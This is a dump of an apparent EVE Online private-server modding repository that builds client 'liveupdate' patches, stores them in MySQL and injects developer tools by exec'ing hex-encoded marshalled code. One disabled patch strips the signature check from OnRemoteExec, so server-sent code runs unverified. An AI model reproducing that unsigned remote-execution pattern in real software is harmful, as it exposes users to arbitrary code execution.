U/n8+nYw6P7IU3GHWBqZGsdzl17K1zFEvOfbbCCyCoPuyhUUl/xmaS01UmI2VpRp1EqdHP2IgAra2CJjESR0gHrioPcYt4gt1hpkDsYZvmZItPxmHp6viuYF7POkUqCNhto0cePPgR+yRi/rhe6sraW2P0A0MVyPK4FuvJG5UW5Uug6FZUvDLqGBBrUyVwd345Khi5oPIPw0e3qoav7aXplTS/pA8TkpQvxFQtOeRfzhufFSsNc4qnwfNH5ur4Rdh5MO7kRmUKwc2RF+KB3CqrevNd4tbjGy612N/bpJDFOZsTvFb4dpleUA3IX4l8WDXJ5Y2NSta5m8bGxzxchXvjDCfStGEISahRG6L3c12JIF+IMFowzUl6/UKrUL5SKz9b6fI3btb/GjflykexitmOPrbVJf/HXprVTaXmHKgTmMqM8Fg5glDL2a3Ctv/htbUqrm3yyjWc9L1v+G9vkTwUS6YUcCkSuVoEUnyz3+f62SwcbaqlycQ85CTyd6q1WVlruaZYl0QaWclNJruYBhk1D2ZW+dLodvGQ6eMxMVEJFU+V7p+XDgPYn4IVt35mXMte4n5JI4jQMJ07Ub7Es31iu3GhI84EphZTOm1n0gmEYz3tYkoT1+KNG51EuvFzs6DKMlnKxQ86T0m8ZPfIzLfhMNzXHgfoZrA3wAt1vZMmwMHhn3/3uyPHdi7+a9OQ1OLHwLX+Ln3yPeiCnUTN6FrQ7o2Uj57VsDr1RLW6eMhY6oOU2gPwrfEWQynfwQLrMpThNTnGQd6d+s4iJMj1JXLqntPHsTUWmJ8wy2mus2pZUcA4PWUplBxDX6+jIBO5d9dtKojo+8EYcyVK4aizxwqfR7wJ51aNfVxLV/wM=</diagram></mxfile>"}\"></div>\n<script type=\"text/javascript\" src=\"https://viewer.diagrams.net/js/viewer-static.min.js\"></script>\n</body>\n</html>"
},
{
"alpha_fraction": 0.5496183037757874,
"alphanum_fraction": 0.694656491279602,
"avg_line_length": 12.149999618530273,
"blob_id": "aa8911b2c639413fb7ab88d0e6ae0685c8de0a10",
"content_id": "bb1ef71f468a89842edbcaf3192b627bb1bd7393",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 262,
"license_type": "no_license",
"max_line_length": 34,
"num_lines": 20,
"path": "/requirements.txt",
"repo_name": "lgdc-ufpa/immunogenetic-applications-in-covid-19",
"src_encoding": "UTF-8",
"text": "# others\ntqdm==4.55.1\n\n#data science\nnumpy==1.19.4\npandas==1.2.0\nscipy==1.6.0\n\n# data visualization\nmatplotlib==3.3.3\nseaborn==0.11.1\njupyter==1.0.0\nplotly==4.14.3\n\n# Type Hintings\ntyping==3.7.4.3\n\n# linters and somethings like that\npyflakes==2.2.0\npylint==2.6.0"
},
{
"alpha_fraction": 0.7421875,
"alphanum_fraction": 0.7645089030265808,
"avg_line_length": 46.157894134521484,
"blob_id": "aea1399d1b9d50939c201ced42bffb7662177c12",
"content_id": "b074172021eb857ddf264f5cf5a2b61bece616af",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 896,
"license_type": "no_license",
"max_line_length": 256,
"num_lines": 19,
"path": "/README.md",
"repo_name": "lgdc-ufpa/immunogenetic-applications-in-covid-19",
"src_encoding": "UTF-8",
"text": "# Sprint 01: Obtain genes\n---\n**GOAL:**\nGet the 308 genes from orphanet and retrive manually the html table genes\n# Sprint 02: Generate table of genes\n---\n**GOAL:**\nGenerate a csv table file with links to ensembl, chromossome region, ensembl id for each gene form sprint 01 output (links_genes.html)\n---\n# Sprint 03: analyze in ensembl the genes from table of genes\n---\n**GOAL:**\nAnalyze manually each one of the 308 genes in ensembl storaged in sprint 02 output (gene_link-orphanet_link-ensembl_id-ensembl_chromossome.csv). Get pathogenic variants of each gene analyzed in ensembl variant predictor and get population of these variants\n---\n# Sprint 04: data analysis of the genes analysis\n---\n**GOAL:**\nVisualize outputs of the output of the sprint 03 (analysis of the genes) or even obtain metrics from them. It includes essensially analyse the frequency of the variants in the populations\n---\n"
},
{
"alpha_fraction": 0.7531914710998535,
"alphanum_fraction": 0.7957446575164795,
"avg_line_length": 46.20000076293945,
"blob_id": "a96a166aba257fedd48a2c6c0c69347d7a72dcdc",
"content_id": "4023d3ad9829b911fc3f00d09b0fe2abb5080f66",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 235,
"license_type": "no_license",
"max_line_length": 119,
"num_lines": 5,
"path": "/sprint1_gene_links/README.md",
"repo_name": "lgdc-ufpa/immunogenetic-applications-in-covid-19",
"src_encoding": "UTF-8",
"text": "# Sprint 01: gene links from orphanet site\n---\nThe 308 genes are retrieved manually by the following orphanet link\n\nhttps://www.orpha.net/consor/cgi-bin/Disease_Genes_Simple.php?lng=PT&LnkId=14933&Typ=Pat&diseaseType=Gen&from=rightMenu"
},
{
"alpha_fraction": 0.678670346736908,
"alphanum_fraction": 0.6897506713867188,
"avg_line_length": 35.125,
"blob_id": "37e0f459fddf22030a0926ccfd00432007a7bb81",
"content_id": "336d6c131f5a7da857e4323aa7409920ce88e782",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1448,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 40,
"path": "/sprint2_genes_from_orphanet/main.py",
"repo_name": "lgdc-ufpa/immunogenetic-applications-in-covid-19",
"src_encoding": "UTF-8",
"text": "from bs4 import BeautifulSoup\nfrom urllib.parse import urljoin\nimport requests\nfrom lxml import etree\nfrom lxml import html\nfrom tqdm import tqdm\n\n\nwith open('gene_link-orphanet_link-ensembl_id-ensembl_chromossome.csv', \"w\") as f:\n f.write('Gene>Link orphanet>Link Ensembl>Código no Ensembl>Localização Cromossômica>\\n')\n f.close()\n\n# soup = BeautifulSoup(open(\"links_genes.html\", \"r\"), 'html.parser')\nsoup = BeautifulSoup(open(\"links_genes.html\", \"r\"), 'html.parser')\n\nlist_li = soup.find_all('li')\n\nfor li in tqdm(list_li):\n\tgene_name = li.text\n\t# print(gene_name)\n\t# link_orphanet = li.find('a', href=True).get('href')\n\tbase = \"https://www.orpha.net/consor/cgi-bin/\"\n\tlink_orphanet = urljoin(base, li.find('a')['href'].replace(' ', '%20'))\n\t# print(link_orphanet)\n\n\treq_gene = requests.get(link_orphanet)\n\t# tree = etree.parse(req_gene, etree.HTMLParser())\n\t# tree = html.fromstring(req_gene.content)\n\t# trs = tree.xpath('//*[@id=\"ContentType\"]/div[2]/ul/li[9]')\n\n\tsoup2 = BeautifulSoup(req_gene.text, 'html.parser')\n\tchromossome_region = soup2.find_all('strong')[4].text\n\tommin_link = soup2.find_all('strong')[5]\n\n\tid_ensembl = soup2.find_all('strong')[9].text\n\tlink_ensembl = soup2.find_all('strong')[9].find('a')['href'].replace(' ', '%20')\n\t\n\twith open('gene_link-orphanet_link-ensembl_id-ensembl_chromossome.csv', \"a\") as f:\n\t\tf.write(f'{gene_name}>{link_orphanet}>{link_ensembl}>{id_ensembl}>{chromossome_region}\\n')\n\t\tf.close()"
}
] | 5 |
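The sprint2 scraper above hand-assembles its '>'-separated output. For reference, a sketch of the same writing step with the standard csv module; the row values here are purely illustrative, not scraped data:

```
# Sketch only: same columns and '>' delimiter as the scraper above.
import csv

header = ['Gene', 'Link orphanet', 'Link Ensembl',
          'Código no Ensembl', 'Localização Cromossômica']
rows = [('BRCA1', 'https://www.orpha.net/...', 'https://www.ensembl.org/...',
         'ENSG00000012048', '17q21.31')]

with open('genes.csv', 'w', newline='') as f:
    w = csv.writer(f, delimiter='>')
    w.writerow(header)
    w.writerows(rows)
```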
utsw-bicf/gudmap_rbk.rna-seq
|
https://github.com/utsw-bicf/gudmap_rbk.rna-seq
|
3997a5d014be8882a176e9d1b0337b0c279e4dfc
|
14a1c222e53f59391d96a2a2e1fd4995474c0d15
|
742382c620f1ca03692464601f8853d6b570e665
|
refs/heads/master
| 2023-04-15T03:00:27.416370 | 2021-05-07T04:43:49 | 2021-05-07T04:43:49 | 338,119,727 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7024539709091187,
"alphanum_fraction": 0.7055214643478394,
"avg_line_length": 20.799999237060547,
"blob_id": "4ded822da5b378df1c8fd9a9454bf6e7dd63ecca",
"content_id": "25a9941de634d36b84ad750c5968fa75009dfd27",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 326,
"license_type": "permissive",
"max_line_length": 65,
"num_lines": 15,
"path": "/workflow/tests/test_completion.py",
"repo_name": "utsw-bicf/gudmap_rbk.rna-seq",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n\nimport pytest\nimport pandas as pd\nfrom io import StringIO\nimport os\nimport json\n\ntest_output_path = os.path.dirname(os.path.abspath(__file__)) + \\\n '/../../'\n\[email protected]\ndef test_multiqcExist(filename):\n assert os.path.exists(os.path.join(\n test_output_path, filename))"
},
{
"alpha_fraction": 0.6366906762123108,
"alphanum_fraction": 0.6582733988761902,
"avg_line_length": 23.173913955688477,
"blob_id": "b71041cb50b58b0206db65bcfd26e8c8260e127e",
"content_id": "a0938e756715fb30254e5c72fee4cd38bffec330",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 556,
"license_type": "permissive",
"max_line_length": 65,
"num_lines": 23,
"path": "/workflow/tests/test_trimData.py",
"repo_name": "utsw-bicf/gudmap_rbk.rna-seq",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n\nimport pytest\nimport pandas as pd\nfrom io import StringIO\nimport os\n\ntest_output_path = os.path.dirname(os.path.abspath(__file__)) + \\\n '/../../'\n\n\[email protected]\ndef test_trimData_se():\n assert os.path.exists(os.path.join(\n test_output_path, 'Q-Y5F6_1M.se_trimmed.fq.gz'))\n\n\[email protected]\ndef test_trimData_pe():\n assert os.path.exists(os.path.join(\n test_output_path, 'Q-Y5F6_1M.pe_val_1.fq.gz'))\n assert os.path.exists(os.path.join(\n test_output_path, 'Q-Y5F6_1M.pe_val_2.fq.gz'))\n"
},
{
"alpha_fraction": 0.6395891904830933,
"alphanum_fraction": 0.6666666865348816,
"avg_line_length": 35.931034088134766,
"blob_id": "849a1be187d17da201e5418bb6131863327cea59",
"content_id": "15e227d4586334721257bc6382d60cf0709bac62",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1071,
"license_type": "permissive",
"max_line_length": 70,
"num_lines": 29,
"path": "/workflow/tests/test_dedupReads.py",
"repo_name": "utsw-bicf/gudmap_rbk.rna-seq",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n\nimport pytest\nimport pandas as pd\nimport os\nimport utils\n\ntest_output_path = os.path.dirname(os.path.abspath(__file__)) + \\\n '/../../'\n\n\[email protected]\ndef test_dedupData():\n assert os.path.exists(os.path.join(\n test_output_path, 'Q-Y5F6_1M.se.sorted.deduped.bam'))\n assert os.path.exists(os.path.join(\n test_output_path, 'Q-Y5F6_1M.se.sorted.deduped.bam.bai'))\n assert os.path.exists(os.path.join(\n test_output_path, 'Q-Y5F6_1M.se.sorted.deduped.chr8.bam'))\n assert os.path.exists(os.path.join(\n test_output_path, 'Q-Y5F6_1M.se.sorted.deduped.chr8.bam.bai'))\n assert os.path.exists(os.path.join(\n test_output_path, 'Q-Y5F6_1M.se.sorted.deduped.chr4.bam'))\n assert os.path.exists(os.path.join(\n test_output_path, 'Q-Y5F6_1M.se.sorted.deduped.chr4.bam.bai'))\n assert os.path.exists(os.path.join(\n test_output_path, 'Q-Y5F6_1M.se.sorted.deduped.chrY.bam'))\n assert os.path.exists(os.path.join(\n test_output_path, 'Q-Y5F6_1M.se.sorted.deduped.chrY.bam.bai'))\n"
},
{
"alpha_fraction": 0.6701388955116272,
"alphanum_fraction": 0.6840277910232544,
"avg_line_length": 19.571428298950195,
"blob_id": "8215b8e4b8dad26907a9553bbd2873fd5023a05e",
"content_id": "273b2cdbb892a464a26b152db2c5d5c0a46922bf",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 288,
"license_type": "permissive",
"max_line_length": 76,
"num_lines": 14,
"path": "/workflow/tests/test_makeBigWig.py",
"repo_name": "utsw-bicf/gudmap_rbk.rna-seq",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n\nimport pytest\nimport pandas as pd\nimport os\nimport utils\n\ntest_output_path = os.path.dirname(os.path.abspath(__file__)) + \\\n '/../../'\n\n\[email protected]\ndef test_makeBigWig():\n assert os.path.exists(os.path.join(test_output_path, 'Q-Y5F6_1M.se.bw'))\n"
},
{
"alpha_fraction": 0.649350643157959,
"alphanum_fraction": 0.6655844449996948,
"avg_line_length": 19.53333282470703,
"blob_id": "c9be91eea2d1b7cf9b37b504530c0b5ff6f31c37",
"content_id": "07e76108fbfc92f945060d8e5d1e1ea8f74e6a4a",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 308,
"license_type": "permissive",
"max_line_length": 65,
"num_lines": 15,
"path": "/workflow/tests/test_fastqc.py",
"repo_name": "utsw-bicf/gudmap_rbk.rna-seq",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n\nimport pytest\nimport pandas as pd\nfrom io import StringIO\nimport os\n\ntest_output_path = os.path.dirname(os.path.abspath(__file__)) + \\\n '/../../'\n\n\[email protected]\ndef test_fastqc():\n assert os.path.exists(os.path.join(\n test_output_path, 'Q-Y5F6_1M.R1_fastqc.zip'))\n"
}
] | 5 |
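The test files above repeat one os.path.exists assert per expected output. A sketch of the same checks expressed as a single parametrized test; the marker name follows the convention of the files above and is assumed to be registered in the project's pytest configuration:

```
# Sketch only: consolidates the dedup existence checks from the record above.
import os
import pytest

test_output_path = os.path.dirname(os.path.abspath(__file__)) + '/../../'

@pytest.mark.dedupData
@pytest.mark.parametrize('suffix', [
    'bam', 'bam.bai', 'chr8.bam', 'chr8.bam.bai',
    'chr4.bam', 'chr4.bam.bai', 'chrY.bam', 'chrY.bam.bai'])
def test_dedupData_outputs(suffix):
    assert os.path.exists(os.path.join(
        test_output_path, 'Q-Y5F6_1M.se.sorted.deduped.' + suffix))
```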
THUNDERGROOVE/evegen
|
https://github.com/THUNDERGROOVE/evegen
|
aba54cbb30be7428aedd4d9eb60323bf2f591193
|
64d24eb560fb8762943c01bfd00b65a2b03bcfbc
|
fbaedac5fa3e2eacd0d1c38ed89291ffce5959aa
|
refs/heads/master
| 2021-10-29T19:49:26.679989 | 2021-10-10T00:15:34 | 2021-10-10T00:15:34 | 104,972,076 | 4 | 3 |
MIT
| 2017-09-27T04:31:19 | 2021-10-09T06:43:43 | 2021-10-10T00:15:34 |
C
|
[
{
"alpha_fraction": 0.6928571462631226,
"alphanum_fraction": 0.6928571462631226,
"avg_line_length": 45.66666793823242,
"blob_id": "07fa3409833c784c7387b9d080ac8c82376c4ad6",
"content_id": "7c565b8ab88da59cde7b7ca66498bdcdf4b51439",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 280,
"license_type": "permissive",
"max_line_length": 72,
"num_lines": 6,
"path": "/patches/disabled/OnRemoteExecDisableSignCheck.py",
"repo_name": "THUNDERGROOVE/evegen",
"src_encoding": "UTF-8",
"text": "#@liveupdate(\"globalClassMethod\", \"svc.debug::debugSvc\", \"OnRemoteExec\")\ndef OnRemoteExec(self, signedCode):\n eve.Message(\"CustomNotify\", {\"notify\": \"OnRemoteExec called\"})\n # No need to check if we're a client!\n code = marshal.loads(signedCode)\n self._Exec(code, {})\n"
},
{
"alpha_fraction": 0.5503681302070618,
"alphanum_fraction": 0.5575636029243469,
"avg_line_length": 47.97541046142578,
"blob_id": "8eb3c161008ae71928013a73a2f530eeb1c62415",
"content_id": "69bcca206e28ba1c5a64ef61ba4afb85b176f673",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5976,
"license_type": "permissive",
"max_line_length": 186,
"num_lines": 122,
"path": "/patches/EnableChatSlash.py",
"repo_name": "THUNDERGROOVE/evegen",
"src_encoding": "UTF-8",
"text": "#@liveupdate(\"globalClassMethod\", \"form.LSCChannel::Channel\", \"InputKeyUp\")\n#@patchinfo(\"InputKeyUp\", \"Allow / in chat without svc_slash\")\ndef InputKeyUp(self, *args):\n import blue\n shift = uicore.uilib.Key(uiconst.VK_SHIFT)\n if shift:\n return \n if self.waitingForReturn and blue.os.GetWallclockTime() - self.waitingForReturn < MIN:\n txt = self.input.GetValue(html=0)\n txt = txt.rstrip()\n cursorPos = -1\n self.input.SetValue(txt, cursorPos=cursorPos)\n eve.Message('uiwarning03')\n return \n NUM_SECONDS = 4\n if session.userType == 23 and (type(self.channelID) != types.IntType or self.channelID < 2100000000 and self.channelID > 0):\n lastMessageTime = long(getattr(self, 'lastMessageTime', blue.os.GetWallclockTime() - 1 * MIN))\n if blue.os.GetWallclockTime() - lastMessageTime < NUM_SECONDS * SEC:\n eve.Message('LSCTrialRestriction_SendMessage', {'sec': (NUM_SECONDS * SEC - (blue.os.GetWallclockTime() - lastMessageTime)) / SEC})\n return \n setattr(self, 'lastMessageTime', blue.os.GetWallclockTime())\n txt = self.input.GetValue(html=0)\n self.input.SetValue('')\n txt = txt.strip()\n while txt.endswith('<br>'):\n txt = txt[:-4]\n\n txt = txt.strip()\n while txt.startswith('<br>'):\n txt = txt[4:]\n\n txt = txt.strip()\n if not txt or len(txt) <= 0:\n return \n if sm.GetService('LSC').IsLanguageRestricted(self.channelID):\n try:\n if unicode(txt) != unicode(txt).encode('ascii', 'replace'):\n uicore.registry.BlockConfirm()\n eve.Message('LscLanguageRestrictionViolation')\n return \n except:\n log.LogTraceback('Gurgle?')\n sys.exc_clear()\n eve.Message('uiwarning03')\n return \n if boot.region == 'optic':\n try:\n bw = str(localization.GetByLabel('UI/Chat/ChannelWindow/OpticServerBannedWords')).decode('utf-7')\n banned = [ word for word in bw.split() if word ]\n for bword in banned:\n if txt.startswith('/') and not (txt.startswith('/emote') or txt.startswith('/me')):\n txt = txt\n else:\n txt = txt.replace(bword, '*')\n\n except Exception:\n log.LogTraceback('Borgle?')\n sys.exc_clear()\n if not sm.GetService('LSC').IsSpeaker(self.channelID):\n access = sm.GetService('LSC').GetMyAccessInfo(self.channelID)\n if access[1]:\n if access[1].reason:\n reason = access[1].reason\n else:\n reason = localization.GetByLabel('UI/Chat/NotSpecified')\n if access[1].admin:\n admin = access[1].admin\n else:\n admin = localization.GetByLabel('UI/Chat/NotSpecified')\n if access[1].untilWhen:\n borki = localization.GetByLabel('UI/Chat/CannotSpeakOnChannelUntil', reason=reason, untilWhen=access[1].untilWhen, admin=admin)\n else:\n borki = localization.GetByLabel('UI/Chat/CannotSpeakOnChannel', reason=reason, admin=admin)\n else:\n borki = localization.GetByLabel('UI/Chat/CannotSpeakOnChannel', reason=localization.GetByLabel('UI/Chat/NotSpecified'), admin=localization.GetByLabel('UI/Chat/NotSpecified'))\n self._Channel__LocalEcho(borki)\n if txt != '' and txt.replace('\\r', '').replace('\\n', '').replace('<br>', '').replace(' ', '').replace('/emote', '').replace('/me', '') != '':\n if txt.startswith('/me'):\n txt = '/emote' + txt[3:]\n spoke = 0\n if self.inputs[-1] != txt:\n self.inputs.append(txt)\n self.inputIndex = None\n nobreak = uiutil.StripTags(txt.replace('<br>', ''))\n if nobreak.startswith('/') and not (nobreak.startswith('/emote') or nobreak == '/'):\n for commandLine in uiutil.StripTags(txt.replace('<br>', '\\n')).split('\\n'):\n try:\n slashRes = uicore.cmd.Execute(commandLine)\n if slashRes is not None:\n sm.GetService('logger').AddText('slash result: %s' % slashRes, 
'slash')\n elif nobreak.startswith('/tutorial') and eve.session and eve.session.role & service.ROLE_GML:\n sm.GetService('tutorial').SlashCmd(commandLine)\n elif eve.session and eve.session.role & ROLE_SLASH:\n if commandLine.lower().startswith('/mark'):\n sm.StartService('logger').LogError('SLASHMARKER: ', (eve.session.userid, eve.session.charid), ': ', commandLine)\n slashRes = sm.RemoteSvc('slash').SlashCmd(commandLine)\n if slashRes is not None:\n sm.GetService('logger').AddText('slash result: %s' % slashRes, 'slash')\n self._Channel__LocalEcho('/slash: ' + commandLine)\n except:\n self._Channel__LocalEcho('/slash failed: ' + commandLine)\n raise \n\n else:\n stext = uiutil.StripTags(txt, ignoredTags=['b',\n 'i',\n 'u',\n 'url',\n 'br'])\n try:\n if type(self.channelID) != types.IntType and self.channelID[0][0] in ('constellationid', 'regionid') and util.IsWormholeSystem(eve.session.solarsystemid2):\n self._Channel__Output(localization.GetByLabel('UI/Chat/NoChannelAccessWormhole'), 1, 1)\n return \n self.waitingForReturn = blue.os.GetWallclockTime()\n self._Channel__LocalEcho(stext)\n if not IsSpam(stext):\n sm.GetService('LSC').SendMessage(self.channelID, stext)\n else:\n self.waitingForReturn = 0\n except:\n self.waitingForReturn = 0\n raise \n"
},
{
"alpha_fraction": 0.5522703528404236,
"alphanum_fraction": 0.5659978985786438,
"avg_line_length": 27.696969985961914,
"blob_id": "33543b6b8f6d8ebddfa63b53e9cdfa4634970989",
"content_id": "475ef77409f85186f904ac76bee1441e0526c43b",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1894,
"license_type": "permissive",
"max_line_length": 74,
"num_lines": 66,
"path": "/src/db.cpp",
"repo_name": "THUNDERGROOVE/evegen",
"src_encoding": "UTF-8",
"text": "#include \"db.h\"\n\n#include \"patch.h\"\n\n//#include <my_global.h>\n#include <mysql.h>\n\nMYSQL *con = NULL;\n\nbool DBInit(const char *username, const char *password, const char *db) {\n con = mysql_init(NULL);\n if (con == NULL) {\n printf(\" ERROR | Unable to do preliminary mysql connection\\n\");\n printf(\" | %s\\n\", mysql_error(con));\n return false;\n }\n\n if (mysql_real_connect(con, \"localhost\", username, password,\n NULL, 0, NULL, 0) == NULL) {\n printf(\" ERROR | Unable to connect to mysql server\\n\");\n printf(\" | %s\\n\", mysql_error(con));\n return false;\n }\n\n if (mysql_select_db(con, db)) {\n printf(\" ERROR | Unable to select database '%s'\\n\", db);\n printf(\" | %s\\n\", mysql_error(con));\n return false;\n }\n\n return true;\n}\n\nconst char *insert_statement = R\"(\nINSERT liveupdates SET\nupdateID=%d, updateName='%s', description='%s',\nmachoVersionMin=%d, machoVersionMax=%d,\nbuildNumberMin=%d, buildNumberMax=%d,\nmethodName='%s', objectID='%s', codeType='%s', code='%s';\n)\";\n\nbool DBCleanLiveupdates() {\n if (mysql_query(con, \"TRUNCATE TABLE liveupdates;\")) {\n printf(\" ERROR | Unable to truncate liveupdates\\n\");\n printf(\" | %s\\n\", mysql_error(con));\n return false;\n }\n return true;\n}\n\nbool DBApplyPatch(Patch *p, int id) {\n char buffer[10000];\n char *codebuf = (char *)calloc((p->bytecode_size * 2) + 1, 1);\n mysql_real_escape_string(con, codebuf, p->bytecode, p->bytecode_size);\n snprintf(buffer, 10000, insert_statement,\n id, p->name, \"Generated by evegen\",\n 1, 330,\n 1, 500000,\n p->method_name, p->class_name, p->type, codebuf\n );\n if (mysql_query(con, buffer)) {\n printf(\" ERROR | %s\\n\", mysql_error(con));\n return false;\n }\n return true;\n}\n"
},
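DBApplyPatch above builds the INSERT by hand and escapes the bytecode blob with mysql_real_escape_string. For comparison, a sketch of the same insert from Python with a parameterized query, which needs no manual escaping; the driver choice and the dict layout of p are assumptions:

```
# Sketch only: assumes the mysqlclient driver (import MySQLdb) and a patch
# dict mirroring the Patch struct above.
import MySQLdb

def apply_patch(con, patch_id, p):
    cur = con.cursor()
    cur.execute(
        "INSERT INTO liveupdates SET updateID=%s, updateName=%s, "
        "description=%s, machoVersionMin=%s, machoVersionMax=%s, "
        "buildNumberMin=%s, buildNumberMax=%s, methodName=%s, "
        "objectID=%s, codeType=%s, code=%s",
        (patch_id, p['name'], 'Generated by evegen', 1, 330, 1, 500000,
         p['method_name'], p['class_name'], p['type'], p['bytecode']))
    con.commit()
```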
{
"alpha_fraction": 0.6880000233650208,
"alphanum_fraction": 0.6909090876579285,
"avg_line_length": 34.230770111083984,
"blob_id": "7d1305f65204ea14b2f15d9e4c043207ed06d56f",
"content_id": "1498c3d9cd10430a19affc7d2d90bdfb3616e48a",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1375,
"license_type": "permissive",
"max_line_length": 115,
"num_lines": 39,
"path": "/devtools.py",
"repo_name": "THUNDERGROOVE/evegen",
"src_encoding": "UTF-8",
"text": "def Bootstrap(a, b):\n import marshal\n import imp\n import sys\n import svc\n import service\n import types\n import form\n import nasty\n\n\n\n insiderClass = 'hexex::insider.py' #This will get replaced with the actual hex encoded code\n code = marshal.loads(insiderClass.decode('hex'))\n insider = imp.new_module('insider')\n exec code in insider.__dict__, None\n setattr(svc, 'insider', insider.insider)\n sm.StopService('insider')\n sm.StartService('insider')\n\n devWindowClass = 'hexex::devToolsWindow.py'\n devConsoleClass = 'hexex::devToolsConsole.py'\n\n code2 = marshal.loads(devWindowClass.decode('hex'))\n DevWindow = imp.new_module(\"DevWindow\")\n exec code2 in DevWindow.__dict__, None\n #setattr(form, \"DevWindow\", DevWindow.DevWindow)\n nasty.nasty.RegisterNamedObject(DevWindow.DevWindow, \"form\", \"DevWindow\", \"devtools.py\", globals())\n\n code3 = marshal.loads(devConsoleClass.decode('hex'))\n ConsoleWindow = imp.new_module(\"ConsoleWindow\")\n exec code3 in ConsoleWindow.__dict__, None\n nasty.nasty.RegisterNamedObject(ConsoleWindow.ConsoleWindow, \"form\", \"ConsoleWindow\", \"devtools.py\", globals())\n\n script = 'def evemuLoad():\\n\\tsm.StartService(\"insider\")'\n code = compile(script, '<script>', 'exec')\n data = marshal.dumps(code)\n exec marshal.loads(data) in None, None\n a.Loader = evemuLoad\n\n"
},
{
"alpha_fraction": 0.7411167621612549,
"alphanum_fraction": 0.7411167621612549,
"avg_line_length": 18.700000762939453,
"blob_id": "d802978162c08cf3cf009c0e7da79c9a09c02ee3",
"content_id": "9e29d5046e98a485ac0ad28912072fc077b0d3bf",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 197,
"license_type": "permissive",
"max_line_length": 53,
"num_lines": 10,
"path": "/src/devtools.h",
"repo_name": "THUNDERGROOVE/evegen",
"src_encoding": "UTF-8",
"text": "#ifndef __DEVTOOLS_H__\n#define __DEVTOOLS_H__\n\n#include <Python.h>\n#include <marshal.h>\n\nbool MakeDevtools(const char *devtools_file);\nbool MakeDevtoolsNoScript(const char *devtools_file);\n\n#endif\n"
},
{
"alpha_fraction": 0.5218217968940735,
"alphanum_fraction": 0.529513418674469,
"avg_line_length": 29.53034210205078,
"blob_id": "6b32dce766462f5edb54ba209cf1d253aa0e28b3",
"content_id": "a77b178ad141547e965f0a318410483923615c7c",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 11571,
"license_type": "permissive",
"max_line_length": 91,
"num_lines": 379,
"path": "/src/patch.cpp",
"repo_name": "THUNDERGROOVE/evegen",
"src_encoding": "UTF-8",
"text": "#include \"patch.h\"\n\n#include <marshal.h>\n#include <dirent.h>\n#include <stdint.h>\n#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n#include <ctype.h>\n\n#include <string>\n#include <sstream>\n#include <vector>\n#include <iterator>\n\n#define STB_C_LEXER_IMPLEMENTATION\n#include \"stb_c_lexer.h\"\n\n// Small template for assiting string spliting\ntemplate<typename out>\nvoid split(const std::string &s, char delim, out result) {\n std::stringstream ss;\n ss.str(s);\n std::string item;\n while (std::getline(ss, item, delim)) {\n *(result++) = item;\n }\n}\n\nstd::vector<std::string> split(const std::string &s, char delim) {\n std::vector<std::string> elems;\n split(s, delim, std::back_inserter(elems));\n return elems;\n}\n\n// This parses the liveupdate deco after the liveupdate decorator\nstatic bool ParseLiveupdate(stb_lexer *lex, Patch *p) {\n stb_c_lexer_get_token(lex);\n if (lex->token != '(') {\n printf(\" ERROR | Expected '(' in liveupdate but got something else\\n\");;\n return false;\n }\n\n std::vector<std::string> args;\n while (true) {\n stb_c_lexer_get_token(lex);\n if (lex->token == CLEX_dqstring) {\n args.push_back(std::string(lex->string));\n }\n if (lex->token == ',') {\n continue;\n }\n if (lex->token == ')') {\n break;\n }\n }\n\n p->type = strdup(args[0].c_str());\n p->class_name = strdup(args[1].c_str());\n p->method_name = strdup(args[2].c_str());\n return true;\n}\n\n// This parses the patchinfo decorator after the patchinfo identifier\nstatic bool ParseInfo(stb_lexer *lex, Patch *p) {\n stb_c_lexer_get_token(lex);\n if (lex->token != '(') {\n printf(\" ERROR | Expected '(' in patchinfo but got something else\\n\");\n return false;\n }\n std::vector<std::string> args;\n while (true) {\n stb_c_lexer_get_token(lex);\n if (lex->token == CLEX_dqstring) {\n args.push_back(std::string(lex->string));\n }\n if (lex->token == ',') {\n continue;\n }\n if (lex->token == ')') {\n break;\n }\n }\n p->func_name = strdup(args[0].c_str());\n p->desc = strdup(args[1].c_str());\n return true;\n}\n\n// CreatePatch returns a Patch pointer given a filename to the patch file\nPatch *CreatePatch(const char *filename) {\n Patch *p = (Patch *)calloc(1, sizeof(Patch));\n stb_lexer lex;\n\n FILE *f = fopen(filename, \"r\");\n fseek(f, 0, SEEK_END);\n size_t size = ftell(f);\n rewind(f);\n\n char *data = (char *)calloc(size + 1, 1);\n size_t rsize = fread(data, 1, size, f);\n if (rsize != size) {\n printf(\" WARN | File read smaller than file size???\\n\");\n }\n\n p->data = data;\n p->name = strdup(filename);\n\n std::string patch(data);\n std::vector<std::string> lines = split(data, '\\n');\n 